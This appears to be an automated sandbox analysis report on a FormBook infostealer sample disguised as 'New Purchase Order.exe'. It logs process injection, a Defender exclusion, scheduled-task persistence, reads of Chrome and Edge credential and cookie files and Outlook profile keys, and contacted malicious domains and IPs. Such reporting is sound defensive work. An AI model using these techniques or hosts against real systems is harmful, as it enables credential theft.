            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: SguBfrlSDIFxPr.exe, 00000010.00000002.3378000689.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000000.2306003043.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3378199890.0000000000F50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: SguBfrlSDIFxPr.exe, 00000010.00000002.3378000689.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000000.2306003043.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3378199890.0000000000F50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: SguBfrlSDIFxPr.exe, 00000010.00000002.3378000689.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000000.2306003043.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3378199890.0000000000F50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: SguBfrlSDIFxPr.exe, 00000010.00000002.3378000689.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000000.2306003043.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3378199890.0000000000F50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Users\user\Desktop\New Purchase Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Users\user\AppData\Roaming\hbaiQWstL.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1512971 Sample: New Purchase Order.exe Startdate: 18/09/2024 Architecture: WINDOWS Score: 100 59 www.nevsehir-nakliyat.xyz 2->59 61 www.nosr.net 2->61 63 11 other IPs or domains 2->63 75 Suricata IDS alerts for network traffic 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 Antivirus / Scanner detection for submitted sample 2->79 83 11 other signatures 2->83 10 New Purchase Order.exe 7 2->10         started        14 hbaiQWstL.exe 5 2->14         started        signatures3 81 Performs DNS queries to domains with low reputation 59->81 process4 file5 51 C:\Users\user\AppData\Roaming\hbaiQWstL.exe, PE32 10->51 dropped 53 C:\Users\...\hbaiQWstL.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmpBCD4.tmp, XML 10->55 dropped 57 C:\Users\user\...57ew Purchase Order.exe.log, ASCII 10->57 dropped 93 Adds a directory exclusion to Windows Defender 10->93 95 Injects a PE file into a foreign processes 10->95 16 New Purchase Order.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        97 Antivirus detection for dropped file 14->97 99 Multi AV Scanner detection for dropped file 14->99 101 Machine Learning detection for dropped file 14->101 25 schtasks.exe 1 14->25         started        27 hbaiQWstL.exe 14->27         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 SguBfrlSDIFxPr.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 103 Found direct / indirect Syscall (likely to bypass EDR) 29->103 42 setupugc.exe 13 29->42         started        process11 signatures12 85 Tries to steal Mail credentials (via file / registry access) 42->85 87 Tries to harvest and steal browser information (history, passwords, etc) 42->87 89 Modifies the context of a thread in another process (thread injection) 42->89 91 3 other signatures 42->91 45 SguBfrlSDIFxPr.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 nosr.net 82.221.128.183, 49723, 80 THORDC-ASIS Iceland 45->65 67 www.complexity.pub 217.160.0.127, 57951, 57952, 57953 ONEANDONE-ASBrauerstrasse48DE Germany 45->67 69 4 other IPs or domains 45->69 105 Found direct / indirect Syscall (likely to bypass EDR) 45->105 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
